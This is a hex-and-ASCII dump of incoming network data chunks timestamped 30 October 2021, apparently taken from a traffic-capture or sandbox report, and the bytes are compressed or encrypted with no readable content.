                                                                                                                                                                                      2021-10-30 11:52:16 UTC480INData Raw: 4a 07 95 c7 76 f9 95 8d c5 bd cb 7a c1 2f 5b b0 e4 55 67 ec ca 36 b0 6c 62 97 6f c6 be 74 f2 68 8c 6c a7 50 a1 74 0a 22 67 9e 35 57 05 43 8e 1a 1f a3 41 f6 b1 02 b3 66 d2 57 be e4 4d 79 d4 92 65 ee f4 95 66 7d e7 5d 69 e5 ab fb 9a 55 7e 73 6c 23 8f ee ac 37 1f 7f eb 72 f3 c6 83 cb cd d3 a7 2e df 65 9b 39 04 b7 6e 2a 1b 33 63 b3 e6 bb 04 cf 7b 50 f3 1a f4 35 31 ec 99 bf b1 71 5d dc 7c ec 63 97 9b b7 de ba bc 7a 70 ff c2 bf 92 79 f5 8c ef 54 42 63 76 75 99 e6 e9 43 6c bf 4e 03 c3 17 f9 e3 da f1 0d 92 3c ca d4 37 11 df 64 95 78 27 58 53 1a 48 9e dc 0c 8e c1 99 fd a9 5f f1 a1 35 e3 ad 87 97 5f f9 2f fd 8a cb 6f fe c3 bf fe f2 9d bf e9 97 5c fe 99 7f e1 97 5e 7e e9 f7 fe 82 cb 4f fc d8 4f 5f be f0 b3 ef 6b 81 c2 6f 38 41 9a 58 ad eb 60 c0 4c 5b 6d 0b 42 ec a6
                                                                                                                                                                                      Data Ascii: Jvz/[Ug6lbothlPt"g5WCAfWMyef}]iU~sl#7r.e9n*3c{P51q]|czpyTBcvuClN<7dx'XSH_5_/o\^~OO_ko8AX`L[mB
                                                                                                                                                                                      2021-10-30 11:52:16 UTC482INData Raw: f6 39 e3 fc 31 77 f6 7c eb 40 dc 81 9a 91 9b 66 9f ef 94 f1 1a 68 6f 54 a3 9b b7 c6 df bf e0 0f 6b 40 f9 a7 e5 dc 34 3f f5 99 4f 5d 7e de af f9 f6 cb c7 be 51 e7 e0 4d 0d e0 a0 17 9a bb cf be a0 e0 ff 0b ef 5d de fd 6b 3f 79 79 fe b3 ef f9 12 67 a9 b2 73 2a 82 d5 0e 3f 06 36 6a 7d d6 84 e7 07 4b 5b 26 8d 7c ac d7 a0 ff 37 aa 44 da e6 bf ed f0 89 5c c8 b8 18 23 7a 9c a1 6c 42 a8 3a e4 42 98 9b 39 01 95 1f 77 4a f6 4d bb 90 b4 e8 b5 63 46 5e b3 c6 4a 48 d3 da 1f be 1b 55 44 38 cf 85 0e 25 2f 6c 65 90 4b e8 3d db 8f bc f4 e6 b3 dd 7a fa 6d db d0 ad 4a f0 1f 35 92 59 7a fb 1a 63 96 71 6d 21 fb 3a 03 95 29 ff 0b d5 d3 df 79 12 c4 d1 60 da c7 bd 53 21 ee 42 f1 cb e7 3a 7f ec a2 3d bf 3c d5 1f 31 ef 8b 9f 3c 7f 7a 79 fa fc b9 e4 67 97 f7 a4 7f 59 fc 25 ad cd 5f
                                                                                                                                                                                      Data Ascii: 91w|@fhoTk@4?O]~QM]k?yygs*?6j}K[&|7D\#zlB:B9wJMcF^JHUD8%/leK=zmJ5Yzcqm!:)y`S!B:=<1<zygY%_
                                                                                                                                                                                      2021-10-30 11:52:16 UTC483INData Raw: 94 34 1d 96 0d b9 fb 02 d6 4b 19 79 ad f3 af 0c 0b 39 2f 60 05 68 d9 51 6b 1d 37 d1 ed d3 ba a5 a2 96 0b bb b1 67 7b e1 0e d2 00 70 e8 95 a7 f1 e6 4f fe f1 cb cd 5b 6f ea c6 a1 e5 eb a7 fe d1 e5 f2 f8 c9 e5 d5 57 de 75 fa cd 5b 6f 5c 2e ba b0 08 ce cc ef 28 28 fb 27 10 88 7d 54 7a f6 57 fe ca e5 f1 9f ff 0b 99 f7 3a cf ac f5 bd 3b 35 b1 65 1e 69 7d d3 f7 7d ef e5 eb bf fb 97 e9 86 cd 76 ca 3f 1e bd ff 9f fd e7 97 af fc f9 1f 51 fd 15 5c ad 40 0d cc cd 32 37 ce e0 2f f9 43 bf f5 f2 f1 9f f7 8d 55 7a d3 17 7e f2 73 97 bf f4 ef fe b9 cb e7 fe de e7 93 17 1f f2 e9 7e 81 1a eb cc 51 ce d1 5e 01 a2 5f 2e bf e8 bb 7f ee e5 b7 fd e1 5f 7f e1 7f 17 7e 18 fd fb ff ee 7f 72 f9 b3 7f e6 af 7b 3c b8 2e a8 03 df 04 69 90 af 9f 81 df f0 4d 1f ff c7 de 4d fb bf fe 6f ff
                                                                                                                                                                                      Data Ascii: 4Ky9/`hQk7g{pO[oWu[o\.(('}TzW:;5ei}}v?Q\@27/CUz~s~Q^_._~r{<.iMMo
                                                                                                                                                                                      2021-10-30 11:52:16 UTC484INData Raw: 99 76 d2 e4 28 a2 af f2 51 20 44 da e5 3c 06 fa 36 92 2a 0f 81 55 f6 39 46 f8 7c 4b 27 ca 6b 95 cf 91 84 76 c8 80 ba a3 26 4c ca 72 d2 c0 33 3e cf 39 3a 03 ce cf e7 1e 81 b7 ca 21 37 7a 79 0a 21 4f 31 21 e5 c9 98 d5 c2 c1 08 aa d7 8a 6a 83 d0 cb 3d 8d a3 82 58 33 d7 ae b7 67 4d 5c 0b b5 2b ac 72 fa d5 07 e6 7e 66 1a 1c 6a 70 7d 3f 0d f0 2f 3d f9 38 0e ff a8 80 df 51 d3 33 d4 e0 78 d3 09 e2 2d c5 44 fe 3b 41 e6 8f 06 f9 bc 9f 59 88 0f 04 8b f0 c1 2c 00 a7 8d bb 67 8b e1 c0 2d 92 73 b6 48 d7 cb 05 88 c7 ed 6f ff ef ea 0c fc 17 72 fe 51 3e ae e9 90 f9 f7 5e fa 7e 5a 70 fe f1 7d fe 78 20 bf a7 96 8e 79 de d6 e6 18 bb 6d b8 3e bc 0d 8e 1a eb d5 13 3b 2a c1 0a bb e3 c0 21 d8 de c9 0e ac 3b 1f ee 6e 4e c2 06 3b 63 c0 d8 41 9b 70 d8 0c 4e 36 73 4f 3c 3b 5e 9c 90
                                                                                                                                                                                      Data Ascii: v(Q D<6*U9F|K'kv&Lr3>9:!7zy!O1!j=X3gM\+r~fjp}?/=8Q3x-D;AY,g-sHorQ>^~Zp}x ym>;*!;nN;cApN6sO<;^
                                                                                                                                                                                      2021-10-30 11:52:16 UTC486INData Raw: f6 1d a7 95 65 fb 6c ff f6 24 e7 c8 f3 ce 7a 76 79 c1 d9 cf 45 3d db 79 82 93 5c c8 d7 0b df f1 bc 72 f0 09 f3 df 3d ed e9 a9 5b 1e f5 2f 4f b1 32 ea f6 6b 05 6c 04 e7 71 cc 65 2d 9e 9c db 90 3d ef 61 43 1e b2 93 07 e4 50 a1 f1 ed 76 a5 75 3b 5a 06 6f 75 3a 2d f2 02 97 c3 06 9b 79 ea 7d bc 40 c8 2a 3f e2 11 a8 62 5b 67 a0 d7 75 9b d0 75 26 c2 3a f0 dc e2 5c d0 da d5 03 81 da a1 0a 2e c0 4e 78 ad e3 ce 95 e3 7a 2e 4d e6 83 b7 f2 1f da 86 71 33 cf 84 be a7 08 f0 87 25 fa 9b 27 94 e3 db 80 00 c6 42 5f b2 9f 00 9d 1d 73 3a 3b 74 7c ea ce 14 3a a2 f6 95 80 73 19 dc eb 30 eb c7 3e 0a c0 8e b7 e0 30 73 4c 43 70 5f 03 ea a6 0f d6 1c 6d 02 81 d3 19 ab 3a e0 8d a7 e9 a0 af 44 a7 4d 40 1d f4 47 fa 28 23 e1 31 75 59 2a 3b 80 cf 71 a8 10 0e 86 3b 90 35 94 3d 41 1d 50
                                                                                                                                                                                      Data Ascii: el$zvyE=y\r=[/O2klqe-=aCPvu;Zou:-y}@*?b[guu&:\.Nxz.Mq3%'B_s:;t|:s0>0sLCp_m:DM@G(#1uY*;q;5=AP
                                                                                                                                                                                      2021-10-30 11:52:16 UTC487INData Raw: 49 7a f4 c2 3b cb c3 df bc c3 0e 5a c0 cf 77 c3 1c c6 38 f8 83 77 07 f4 a1 c1 f9 0e 8e 3c 3c 57 70 fd 87 ae 1f 03 00 72 c6 00 dd d6 02 f4 d4 79 c4 93 8e 34 19 ee 5d 37 9c 93 01 cd 37 e5 67 64 fe 2e af d9 a4 a7 9c 3a 80 b7 d0 c2 38 ee 3e 75 12 83 fa 13 98 23 e6 3c 6f c3 19 a3 e3 44 0e a4 13 d5 76 d5 68 e7 1a e7 74 74 f8 7b 5e 77 da 50 b6 ed e6 3d e4 a0 29 1e f3 b3 ee 5b 7c 86 9c 34 84 69 47 0d 32 1d b1 de 61 ab b7 0b 05 7e bf 8b 60 b8 9d b4 1e f6 4d d0 bf 90 d5 c7 b1 ee 6a bd 08 c4 c7 a5 da 7f 06 ed 4d af 9b 14 98 83 b9 26 da 16 6b 10 b9 d6 c9 90 19 47 88 f5 51 eb 57 da 02 bc 76 82 7b ac 88 a6 a3 89 15 24 38 6a ec 34 0e dc 30 90 e8 ed ee e4 b4 b1 10 36 9e 9e a1 39 77 a1 7a a7 aa 39 47 93 4e 57 73 e8 ec dc a9 33 13 c8 87 bc 3a 80 23 f4 f9 54 19 69 ea 6e d9
                                                                                                                                                                                      Data Ascii: Iz;Zw8w<<Wpry4]77gd.:8>u#<oDvhtt{^wP=)[|4iG2a~`MjM&kGQWv{$8j4069wz9GNWs3:#Tin
                                                                                                                                                                                      2021-10-30 11:52:16 UTC491INData Raw: 6d a2 88 43 95 e9 eb 02 0c 99 bb 68 5e 74 e1 9c 21 86 77 4f d2 b1 f2 35 20 49 a3 81 f3 ce eb 4a e3 3e 13 9d 3f e3 e7 c2 ee 5b a3 be 3d 9a b7 52 73 d7 2e cb 61 5c 2d e8 91 16 22 f2 61 4e 96 c5 a9 fb 1d b2 03 d8 16 59 a4 5a b6 12 ed af 1c c0 21 eb ef 5b e9 96 9b 4e 47 9d f1 ac ab 55 7a e3 40 aa 2c 04 52 17 de e2 87 26 21 6d b6 86 51 5a 88 a8 2e 5a 0d 24 5f d0 71 fe 8d 94 ff 9c 7d 63 e1 df 49 6d 86 bc 91 7f c9 a4 bf 95 e2 9f b5 af 2f 6b 36 ac 13 f8 d7 52 1b 10 a6 9d 45 67 8d f3 72 a1 fe 85 60 e9 e2 25 65 d7 25 cb ca f2 a5 cb cb 6e cb 76 2d bb 2e dd a5 ec 02 7d d9 e2 a5 08 5b aa 87 e0 d2 81 a3 43 a7 47 63 a1 86 3a 27 50 47 5e fa 3c 9e 18 33 e4 ad 5f b3 42 a6 a3 b8 6e 8b ff 5f 94 7f be be 96 32 ca a7 ae 7f 4f 40 3c 3f ac 17 f5 47 d8 8c b7 81 8d 76 bf 1e 99 63
                                                                                                                                                                                      Data Ascii: mCh^t!wO5 IJ>?[=Rs.a\-"aNYZ![NGUz@,R&!mQZ.Z$_q}cIm/k6REgr`%e%nv-.}[CGc:'PG^<3_Bn_2O@<?Gvc
                                                                                                                                                                                      2021-10-30 11:52:16 UTC495INData Raw: 2e d3 70 3d 0c 3b 6c 5c 43 c3 69 0b c7 8c eb 2e cf 57 39 6f 81 ba 26 22 3f ad 83 c8 5d 0e 9b ca 49 9a 4d 4e 82 ad 3b 25 d3 1f 50 9b 20 e8 05 3e d8 49 4b 07 4d 72 f2 16 56 9d 35 70 e5 04 d9 a4 5c 2d ca ce d2 87 61 ac a1 1c 16 51 e8 35 8e 65 db 48 61 b7 52 49 e1 38 a4 d9 69 f2 5c f3 48 18 bd 6d 8c 96 4e f9 55 be 2d 20 1d ae c7 2d 0f cf 0e ca 3d ef 9d 33 ce a2 74 ca f8 4a 9e fd 97 36 d9 03 50 f4 36 47 bf e3 9c 43 e6 1c 7c 54 82 72 70 bc ab 7d 3a 62 e2 8c 50 27 56 ca 88 ec db 9f 4d ce 38 3d 9c 1e 0b 14 0a c5 f9 1f 60 58 c8 03 7b 43 73 40 b6 8d 8c 2b 8e c6 db e1 68 36 3b 22 69 73 b8 c1 c5 ce ce 4e 8f 69 ce d8 d8 b6 2d 7b c3 64 fe 03 67 4d e1 0d d9 9e e6 b0 19 b6 65 9c de de 90 f1 8c 2e 4c fd 31 b4 b5 fe 68 36 db e1 78 21 3e 17 9b de 59 93 ad ea b3 94 5d 1d a7
                                                                                                                                                                                      Data Ascii: .p=;l\Ci.W9o&"?]IMN;%P >IKMrV5p\-aQ5eHaRI8i\HmNU- -=3tJ6P6GC|Trp}:bP'VM8=`X{Cs@+h6;"isNi-{dgMe.L1h6x!>Y]
                                                                                                                                                                                      2021-10-30 11:52:16 UTC496INData Raw: df 55 3e f8 de 2f 97 b5 f0 70 d1 15 e8 e7 6c b7 eb 5c 9d 34 f5 e5 d6 f2 f2 9f 9c df 43 4f 79 2b ea 94 33 da af 44 57 3f b5 ae fc eb fb cf 2b 9b d0 f0 fe 12 43 e2 85 e7 d4 d3 8f 99 d7 6e da 37 be 72 3d da de 9c b4 63 4e 3c b8 1c f7 ec f9 7d 19 fe a1 07 57 96 af 7e e9 3a c9 07 1f ba 57 f9 95 df 38 bb 2c 19 3d fc f8 d3 1f bf bc 5c 7a f1 ed b8 66 a2 d6 81 37 be 79 7e bf c4 bc e3 b2 bb cb 23 77 3c ae eb 0e c7 ae ff 3f 41 f6 ca de 87 ef 5b 4e fb a9 57 ee 94 93 c6 dd b4 ad 17 df 88 dc b0 68 62 6e cb 31 93 6c 5d bd ff bc 63 cb 82 43 f6 75 82 9d a0 ad 1b 36 96 8d d7 df 0e 07 0d 0e 06 40 2e 87 6d d1 e2 b2 f4 a8 f9 ff 40 e1 51 38 48 37 5f 74 77 39 fd 5d a7 94 c5 4b 3d 1e f7 dd f2 68 b9 f2 ab b7 62 4d b1 53 22 e7 06 73 76 c5 23 de 5d db 51 da f3 f0 bd 51 71 9e 3c e8
                                                                                                                                                                                      Data Ascii: U>/pl\4COy+3DW?+Cn7r=cN<}W~:W8,=\zf7y~#w<?A[NWhbn1l]cCu6@.m@Q8H7_tw9]K=hbMS"sv#]QQq<
                                                                                                                                                                                      2021-10-30 11:52:16 UTC500INData Raw: 74 b2 02 ad 3b c8 73 94 72 3f 4f 13 72 b6 10 7d ba d3 d6 64 03 e1 e1 b4 39 2d d7 7b ca 8d ab 3c e4 57 29 9a 57 5b 9b fd 02 03 d7 29 ca 5a cf a1 78 fc 86 d0 b5 71 3b 61 e9 e8 d8 de 3b 72 9e 13 e9 dc a5 53 93 e1 35 1e 6c 7d 9e cd 01 0a 40 06 ab 7a 6b 43 60 d4 36 1a 68 d5 4b e1 e6 2d 3f 94 a7 3a 91 3b ff de 01 9d 2e 3b fe 54 1b 77 c9 01 39 67 75 ae c3 49 83 be 55 ce da 26 5c 0b 51 41 7f 02 68 93 4c 03 c7 41 23 d2 26 1e 93 4f 72 ea 86 5a 37 0b b2 a1 55 1e bc 1c 0b a7 49 ed 28 77 4e a6 36 4c 43 6d 50 17 1c 12 59 ff 86 98 d8 88 99 72 8d 07 5b 5e b0 69 c4 b1 e5 9b 0a 04 3a 70 32 84 bc 4d 20 d1 b4 9e 61 1b d5 ce 11 d2 96 e1 d6 db 6e 5e 0f 3b 34 a1 23 51 0d c3 85 ba c5 49 1b 64 c6 19 41 27 48 c4 33 a0 cb 3e 42 17 67 ec 88 49 8f 78 74 aa a6 c9 cd 01 a3 4c db 74 87
                                                                                                                                                                                      Data Ascii: t;sr?Or}d9-{<W)W[)Zxq;a;rS5l}@zkC`6hK-?:;.;Tw9guIU&\QAhLA#&OrZ7UI(wN6LCmPYr[^i:p2M an^;4#QIdA'H3>BgIxtLt
                                                                                                                                                                                      2021-10-30 11:52:16 UTC505INData Raw: 13 ac c9 69 e7 e4 eb 75 cb d6 5b 58 a6 6d ba e2 0b bd ad 81 f1 eb c4 06 30 97 85 d4 15 06 e4 e2 9a f6 7a 72 20 17 62 d2 d9 cb b8 11 6f bb c8 fc 7b bd 0b af 72 d4 9b 3c d2 48 af 40 7b 3a bb c3 c6 7d d4 64 f5 1f 3a ac d7 87 e8 e3 4e 8b 33 b6 f7 e1 cd 06 26 99 c2 5e fb ee 56 7e e9 7d 3f 54 de f8 dd db fe 33 f1 f5 6b 37 94 bf fb fd 4f 97 0b bf 74 35 a6 0a e6 17 5f 98 4f f9 41 80 0b c2 34 3b 81 43 03 c2 13 ac 4b b6 5f fd 84 b6 b3 7f b4 d0 c3 b6 7c d7 f9 fd 55 0f eb fa a1 f7 7d a1 fc d9 af 7d a4 dc 72 e5 dd ca 2b 2f ba 6d 87 36 9d 7c 73 42 b7 ea 67 70 01 ee b0 18 15 7b d5 d9 cf 29 af 7b c7 f0 e1 b8 3b 43 5f fd b7 cb ca e3 f7 af aa 73 94 73 c9 3c e7 72 29 67 7d f7 0b ca fe dd 2f f9 e6 42 37 5e f5 40 b9 ee b2 fb 95 af e7 2a 8e 90 f5 92 3c 53 d6 ae e1 13 ed e6 4f
                                                                                                                                                                                      Data Ascii: iu[Xm0zr bo{r<H@{:}d:N3&^V~}?T3k7Ot5_OA4;CK_|U}}r+/m6|sBgp{){;C_ss<r)g}/B7^@*<SO
                                                                                                                                                                                      2021-10-30 11:52:16 UTC509INData Raw: 70 0c e8 5c f8 2f cf f6 3c f9 19 65 b7 c3 e6 fe bf a8 f7 7e f9 1a fd e5 56 3a 7b de 51 a3 53 e2 5d 35 7f 5f cd 78 f4 ee f9 fd 47 e9 79 5f be 1a ce 59 fe ab 08 c6 15 72 fd b5 27 fb 05 3c af 79 1a 13 5c 13 48 b8 1c f8 7a 84 b9 87 77 ac 2d a1 e3 c5 6b 10 ed b4 39 3c 12 80 90 13 af a6 42 75 d0 90 37 1d b4 74 cc f4 1d 34 c0 8e 17 79 93 e9 a0 f5 4e 19 21 a7 8d 32 a6 d0 7a a2 d3 13 d5 69 53 7f c2 51 23 a0 a7 c3 56 1d 37 d8 85 d4 a7 00 59 54 68 77 ae ea b8 9a 87 33 46 9d 32 b2 1a d8 a8 67 fc 6a 83 d1 3a fa 25 c0 b0 be ef 67 03 0e 15 5c 4b 24 07 a7 de 36 0c 38 04 11 47 72 ea 29 1b fd 98 4d 83 c7 b9 03 d3 20 65 ae fb 39 f6 9e 09 e4 26 71 da 43 e8 c3 aa e4 aa 05 87 0d fd 26 ea ed 01 35 59 46 cb e2 7a 75 76 21 5a c9 31 a0 2e 0e 40 51 3c 1b f1 a6 81 9c 3b 68 1c 10 23
                                                                                                                                                                                      Data Ascii: p\/<e~V:{QS]5_xGy_Yr'<y\Hzw-k9<Bu7t4yN!2ziSQ#V7YThw3F2gj:%g\K$68Gr)M e9&qC&5YFzuv!Z1.@Q<;h#
                                                                                                                                                                                      2021-10-30 11:52:16 UTC513INData Raw: a5 a3 66 67 2d 9d 36 3b 68 f5 b6 27 b1 99 4e d4 e4 8e 9a a0 dd 34 02 8e 99 76 d4 78 0b d4 3b 69 ba ed 29 27 8d 9c f3 93 c8 ba d9 41 ab ce 9a 9c 34 96 d1 9c b4 12 8e 9a 1f c9 11 df eb 46 16 dc 4d 5b 8a 05 85 4e da 12 7c 20 93 a3 86 3c 55 25 51 08 55 4f 1a 1b fa 04 29 77 9c a2 4e af a9 b2 49 72 d8 48 c9 b7 45 e3 38 ec 10 1d 2d 0c a8 c5 9d 12 08 9b ac 71 c8 18 8d 77 36 08 94 0d db 9b 0d 13 a2 ea 94 5b 2c bf 4c c9 a7 52 d7 a8 c9 3e 70 4a 5d a8 3a 92 a6 0b 58 68 35 38 04 47 90 e8 e0 1a 41 e4 e0 29 36 51 1b ab d0 e4 88 51 d7 c5 53 b6 e6 b0 31 2e 2f b5 02 65 20 1d af 01 6a 58 c4 93 cd 79 10 79 39 c2 2c c6 b1 f1 35 4f ac 2a f7 5f 7f 57 79 e6 4b 77 de 59 e3 2e d4 da 27 9e 2e 1b e1 a0 ac ba 7f 65 59 f3 e8 53 fa ff c5 35 01 ca eb 9e 5c 8b a2 39 aa a8 eb e2 e1 77 85
                                                                                                                                                                                      Data Ascii: fg-6;h'N4vx;i)'A4FM[N| <U%QUO)wNIrHE8-qw6[,LR>pJ]:Xh58GA)6QQS1./e jXyy9,5O*_WyKwY.'.eYS5\9w
                                                                                                                                                                                      2021-10-30 11:52:16 UTC517INData Raw: a3 39 69 00 d6 1b ff b0 c0 ed b3 a3 16 3f 1e 90 a3 c6 07 dc a6 a3 b6 b1 2c dc ba 01 d8 08 27 6d 33 e6 f5 96 b2 64 c1 d6 b2 04 8b 28 1d 35 de f6 1c 38 6a bf f9 a6 3f 54 8f 0c 26 42 f0 14 fa 10 c9 38 d8 c6 86 d8 3a 9d 8f 6c d4 3b bb 2f 4a a9 db d6 eb 24 f3 d4 1a a9 d2 a2 e1 94 4a 9a 66 eb a9 0f df a6 8c 43 da c8 7d 92 03 38 e8 42 45 9b 64 da f3 c2 04 d4 2a 87 00 36 68 1f 04 73 eb 3d 31 ff ca 99 57 ca 53 f8 80 22 cf 31 4d b3 35 9a 4c 93 7a 1b 8b b6 98 d8 09 c9 0b ab 17 25 72 01 72 5e 40 ad 47 9a e0 bc e4 91 b3 f6 b9 a3 c1 ce d2 2b 4e 2a 7e 3f ad ed a6 85 b3 16 c8 93 90 27 29 fb cf 3b 6a 23 27 2d 38 1d b5 45 0b fd 93 6a 6f 5d bb 74 96 ca 87 62 8a e3 c0 f1 d2 ad 0d c9 be 08 8c 1d 08 d7 31 a9 5d 66 d8 2f c8 2a da 17 fd 50 6d d9 67 f9 a2 6c 3d 89 79 0a 38 78 1e
                                                                                                                                                                                      Data Ascii: 9i?,'m3d(58j?T&B8:l;/J$JfC}8BEd*6hs=1WS"1M5Lz%rr^@G+N*~?');j#'-8Ejo]tb1]f/*Pmgl=y8x
                                                                                                                                                                                      2021-10-30 11:52:16 UTC521INData Raw: 1e 9e 30 90 e9 a4 c9 39 83 93 d6 76 d3 7c c2 e9 c4 62 1c f6 31 d3 83 38 4b d2 31 ab 7c 41 73 d6 72 27 8d f0 8f 09 7c 02 a5 ac 1c 24 b3 76 c9 8d 6c f9 04 d7 18 b3 0e d2 ac 47 bb 1c a9 c9 03 87 0d dc 25 0e e7 37 61 72 99 cc 5b 8e 1a e4 ba b3 06 5b de 0a a5 f3 c6 ff 53 fc 85 5f 3e 9b 89 76 88 b8 9b f6 c3 3f f4 37 e5 81 07 56 84 a5 27 96 cb 92 1b 49 73 03 5b 58 30 d7 17 ed 51 5f b5 36 48 83 cd d6 8c 67 ca dc 95 97 de b6 90 bb 18 f2 ce 9a 36 e9 a6 94 9d 2f 8e 7a 73 fc 68 21 4f 9d e3 9b b1 5a 3c eb 49 29 f5 25 0c c9 63 6a 52 4d aa da ec cc 25 91 8e 56 7e 1f 8d 63 3c e9 a0 01 11 37 e3 b0 ae 69 c3 5b 79 10 df f5 53 af 2e a7 9f f5 1c 48 3b 4e 6b d7 6e 28 bf f1 2b 1f 29 77 de f1 58 d4 32 e7 71 64 ec 43 50 2f 83 58 f8 2c a4 3c e2 d0 5a 9f 3d 81 a3 df 96 f3 58 c7 13
                                                                                                                                                                                      Data Ascii: 09v|b18K1|Asr'|$vlG%7ar[[S_>v?7V'Is[X0Q_6Hg6/zsh!OZ<I)%cjRM%V~c<7i[yS.H;Nkn(+)wX2qdCP/X,<Z=X
                                                                                                                                                                                      2021-10-30 11:52:16 UTC525INData Raw: d1 16 ac cc 1f 76 5d d8 88 b8 d8 93 f3 6f aa ab 13 16 e0 f3 68 c0 e5 a4 c9 59 1b 86 fb c2 cf 8b b3 f3 11 57 be 51 36 8e 96 4d aa 03 0e 39 c6 54 f4 a2 8d 32 a0 05 af c2 17 01 87 61 2c c9 95 4f f2 21 4c 7d b9 81 ae bd ec 8b b4 b5 be 1f 2e e6 ce af 2d ec 9a 43 15 0e 4f fa f2 57 ae 2d 77 dc f1 48 68 93 74 ee d7 6e 2c 1b 36 32 07 52 d6 23 a9 d5 c5 62 e8 db 40 be 06 76 a5 cf 71 6c 76 3b 62 1e 1b df ae 36 1c 6f 16 44 fc 06 8e 75 8c b3 10 bb 68 7d dc ae 4c 41 ed 20 a5 ad 1f 1f f7 61 92 1d 39 c6 82 10 ed ef 5f d2 61 17 a8 8b bb 5c da 5a 1d 62 fe 8d ea e4 f1 f2 58 2e df 7d 59 39 e3 cc 13 ca 1f fe d9 bb ca af fd d6 d9 e5 a8 a3 f7 47 9c b9 11 6f 75 fe d1 ef 7f be fc cf f7 7c ba ac 59 bb 51 ed ea e7 8c db d6 b8 29 39 a9 93 25 46 bb 7a a8 5d 1d 64 77 1b 2d 6f 03 7d 9f
                                                                                                                                                                                      Data Ascii: v]ohYWQ6M9T2a,O!L}.-COW-wHhtn,62R#b@vqlv;b6oDuh}LA a9_a\ZbX.}Y9Gou|YQ)9%Fz]dw-o}
                                                                                                                                                                                      2021-10-30 11:52:16 UTC528INData Raw: 20 1e 18 53 3c 49 39 c4 d1 94 75 cb bc 3b 06 ea c2 48 2d 60 9b 34 28 72 4c 7d 20 2a c7 13 cb 8e 5a dc e6 24 3a 47 4d 9c 0e dc 34 47 2d 4e 8e de 41 4b ee 0b 8d 2b 3c ae 4f 0b 63 5a c7 99 66 b3 de 18 a9 f5 e7 e4 ec 1d e8 50 52 27 97 2c db 70 ec 14 86 4c 65 a3 2e 7b 2f a7 e6 03 b9 2d 8d 93 9e fd ec 43 cb 41 07 ed 55 ce f9 ea 0d 36 a0 0d ae 36 8e 92 b3 2d 4d ce 36 4b ab 6d 1e 52 5f 46 6b fb 88 46 49 23 f7 ee 08 9a 14 3a c9 b4 3d dd d4 9f a1 ad 42 7d 5c c9 38 d8 86 f6 85 41 2d cd 36 a7 ad ef 03 85 07 4f 1a b4 b9 53 d0 19 8e 95 36 70 89 dd 88 8d c6 35 c3 aa cd 2c f4 49 4e ea e5 ed 53 c6 76 3b b2 15 d9 6e f3 b0 44 bb 05 77 86 e5 8e 8f cb b6 9e 71 a6 90 82 1c be 8d 58 41 db 8b 11 e1 5d b4 56 9f ed e7 6e 42 8a 41 23 ac d4 e3 20 ac 23 64 ef 12 fa 72 d8 67 21 52 0e
                                                                                                                                                                                      Data Ascii: S<I9u;H-`4(rL} *Z$:GM4G-NAK+<OcZfPR',pLe.{/-CAU66-M6KmR_FkFI#:=B}\8A-6OS6p5,INSv;nDwqXA]VnBA# #drg!R
                                                                                                                                                                                      2021-10-30 11:52:16 UTC532INData Raw: 1d 42 a0 13 03 ec 69 53 1f 10 f6 9a 36 64 e6 57 65 09 86 ec 59 2e 55 ca 0c 57 10 8f 34 57 a2 dc eb 6e a9 79 0f 8e 0b 0e 96 dd f3 d2 73 dc b2 97 66 87 d3 4c a0 e6 61 4b b5 e9 85 94 92 23 8b 9e 86 95 0e 15 c7 6c 2c a8 da b6 43 19 a3 8f 49 59 c0 a1 c9 ee 4b eb ee 63 eb 96 bd eb 83 4b 45 c8 5c ba 05 d9 23 6e 95 1b 10 45 08 56 49 f2 c0 de cf c0 46 d6 d1 41 10 c6 f6 21 77 27 3a 7e 83 28 fa 37 7a 3d 54 cb 02 c6 a1 e9 24 cb e3 7c b2 39 d3 c8 29 5b de 99 5b 8e bf ca 50 39 11 6a 31 e4 50 40 5d ca 11 a2 ec a8 00 59 d6 25 65 63 3c 06 3e 6f b9 2b 91 8b dd 00 9b c9 fd fd cf 09 60 d1 23 d7 ed a3 5c 00 2b ba 3c f8 61 a9 ca 51 8e ca cd f2 87 75 1a d7 78 47 31 f9 9a 16 8b 98 25 c6 a8 1e 06 cd 93 36 25 11 59 d0 51 01 26 eb f5 10 47 10 e3 84 52 6d 92 86 50 58 6f 12 0d 94 91
                                                                                                                                                                                      Data Ascii: BiS6dWeY.UW4WnysfLaK#l,CIYKcKE\#nEVIFA!w':~(7z=T$|9)[[P9j1P@]Y%ec<>o+`#\+<aQuxG1%6%YQ&GRmPXo
                                                                                                                                                                                      2021-10-30 11:52:16 UTC537INData Raw: 26 69 fe e3 b6 7c a2 c6 a7 68 fc e8 73 12 34 26 6d 49 d4 98 c8 f9 ff 7a 7a 5d fb a9 9a f7 01 db 53 bb 8a 61 03 e3 0c 4b de c9 98 69 61 27 69 c4 8a 9f b1 6a 0d 63 2d 6b 7d 23 51 d3 53 33 24 64 5f 33 41 fb 4b 4a d4 84 5f 33 49 63 b2 56 89 9a f6 45 ce 47 f6 cb 18 bd 0f f5 31 27 f0 7b 8c e9 3b 26 69 4a d6 9c a8 cd c7 9f 3c ef 78 d6 79 6c 3c df df fd b7 ff f0 67 48 d4 6a 22 05 cd 68 3c 08 dd 54 e8 c3 e5 9a a0 91 07 91 1f 29 4b f2 57 98 96 0b 96 e2 66 fb 55 c0 2d 86 dc ce 82 16 1e 82 7d 09 e5 fb 50 57 ad af a6 9e c6 6b 5d dd c0 ba 91 9c 7f 26 6b fa 05 02 d0 3c 55 db df 57 eb 24 4d 36 55 55 5d f6 c9 c5 a9 df 98 c4 8d c9 93 b3 24 68 df 7e c0 46 60 a2 46 3d 3f 4e ac 64 8d fe 5e 04 5e 9c e4 0d 33 80 89 91 eb a3 16 5e 51 bf 81 53 d6 08 9a 36 34 eb 39 61 ab 6a 39 6b
                                                                                                                                                                                      Data Ascii: &i|hs4&mIzz]SaKia'ijc-k}#QS3$d_3AKJ_3IcVEG1'{;&iJ<xyl<gHj"h<T)KWfU-}PWk]&k<UW$M6UU]$h~F`F=?Nd^^3^QS649aj9k
